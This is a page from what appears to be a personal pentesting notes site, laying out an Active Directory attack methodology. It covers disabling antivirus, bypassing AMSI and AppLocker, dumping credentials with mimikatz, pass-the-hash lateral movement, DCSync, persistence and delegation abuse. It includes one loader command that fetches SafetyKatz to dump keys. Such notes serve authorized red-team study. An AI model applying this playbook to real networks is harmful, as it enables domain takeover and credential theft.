Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  • Note
  • Compromising other domains
  1. Active Directory Pentesting

Methodology

  • Bypass applocker and escape constrained language mode.

  • Bypass AMSI using various techniques.

  • Escalate privilege on current machine.

  • Turn off defender

  • If constrained language mode also known as controlled language mode is enabled see applocker policy and run scripts from allowed directory.

  • Enumerate Current Domain, Forest, Domain Policy, Domain Controllers, Computers, Users, Domain Admins/Enterprise administrator, Groups, Organizational Units, GPO, Restricted Groups using AD module or PowerView.(Donot forget to check description for each user)

  • Enumerate Group Policy Objects by getting list of all GPO in current domain, List all OUs(Organizational Units), List GPOs applied to each Organizational Unit.

  • Enumerate ACL for groups(ex: domain admins), get interesting ACEs, ACL for domain, forest, etc. Focus on Generic all, Generic write permissions and keep note of it.

  • Enumerate trusts of current domain, current forest, another forest, all domains for another forest, external trust of all domains in current forest.

  • Enumerate file shares, file server and sensative files.

  • Find machines where current compromised user has local admin access, Find computers where a domain admin/high value user has sessions, etc

  • Run mimikatz on current machine and check for other user's creds.

  • Access that machine where your user has admin rights using lateral movement technique(ex: winrs)

  • In that machine Disable antivirus at first, then bypass .net AMSI and regular AMSI(invisi-shell), check for language mode if constrained language see applocker policy and transfer script(not executable) to allowed directory

  • Run mimikatz or safetykatz on that machine bypassing by first transferring Loader.exe then port forwrding to download and execute mimikatz, safetykatz from your initial compromised machine(C:\Users\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys)

  • Run over pass the hash(From your initial machine) using creds for the latest extracted users and again find local admin access for that user on any other machine this may throw error so try over pass the hash using BetterSafetyKatz(currently working), SafetyKatz, Rubeus(didnot work), then run Invisi-shell then use Find-PSRemotingLocalAdminAccess.ps1 script.

  • If we do not find local admin access mark your compromised user as owned and check for outbound object control rights from bloodhound, then check shortest path from owned principles from bloodhound itself.

  • If we donot find local admin access, outbound object control rights or shortest path from owned principles use PowerUPSQL to check if any sql instances are accessible as sa.

  • Repeat the steps.

  • After domain admin always perform dcsync to extract hash of krbtgt account.

  • Check bloodhound for each compromised user check if he/she has generic write, generic all permission over any other object(usually computer object) and abuse it.(This is very important do not forget this, if a compromised user has write access on a computer object resource based constrained delegation can be setup and abused). Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'} replace your compromised user with ciadmin to find interesting ACL's

  • In bloodhound after setting a user as compromised remember to view Find shortest path from owned principles not only seeing object control rights or acls.

Note

In case a machine has applocker policy we cannot run Loader because the policy may only allow scripts to run from certain directory note here only scripts allowed not executables so if we ps remote to such machine first we disable antivirus, check the applocker policy from which directory scripts can run then try bypassing .net AMSI and also try copying invisi-shell to that allowed directory and running and finally modifying and copying Invoke-Mimi.ps1 script to the allowed directory and executing to harvest creds.

  • After getting domain admin access go for persistance.

  • If we do not find other paths after compromising a user example our compromised user/users do not have session or local admin rights on other machine then check kerberoasting as well as asreproasting.

  • Check for Set SPN targeted kerberoasting attack if you have generic all or generic write privilege on a user.

  • Check for unconstrained delegation. -> (Able to escalate to enterprise administrator via spooler service)

  • Check for constrained delegation.

  • Check for Resource Based Constrained delegation(RBCD) -> (If a compromised user has write access on computer object RBCD can be setup and abused)

  • Check For priv esc via trusts/ trust attacks(Priv-Esc-Trusts-Inside-Forest.md and Priv-Esc-Trusts-Across-Forest.md) read below............

Compromising other domains

  • Check For AD CS misconfigurations for privilege escalation.(AD CS misconfiguration allows privilege escalation to both domain administrator and enterprise administrator).

  • Finally check for SQL instances where you can connect to, check the database links and see if command execution is possible if on any instance we have SA privilege try command execution to move laterally(remember after compromising every new user use over pass the hash and check which instances you can connect, abuse and continue the cycle)

Previouspowershell theoryNextdomain enumeration

Last updated 9 months ago